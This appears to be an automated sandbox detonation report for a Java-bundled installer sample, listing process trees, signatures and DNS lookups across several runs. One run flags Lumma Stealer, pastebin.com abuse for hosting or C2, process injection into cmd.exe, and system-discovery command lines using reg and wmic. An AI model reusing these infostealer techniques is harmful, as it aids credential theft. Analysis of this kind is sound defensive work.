C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 224
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
100s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2032 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2032 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2032 wrote to memory of 3320 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240708-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 228
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
145s
Max time network
161s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 4692 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5044 wrote to memory of 4692 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5044 wrote to memory of 4692 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
117s
Max time network
125s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 220
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
91s
Max time network
160s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4872 wrote to memory of 1628 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4872 wrote to memory of 1628 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4872 wrote to memory of 1628 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1628 -ip 1628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
147s
Max time network
155s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2456 wrote to memory of 976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2456 wrote to memory of 976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2456 wrote to memory of 976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 976 -ip 976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 604
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 232
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
119s
Max time network
128s
Command Line
Signatures
Lumma Stealer, LummaC
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2396 set thread context of 2184 | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | C:\Windows\SysWOW64\cmd.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
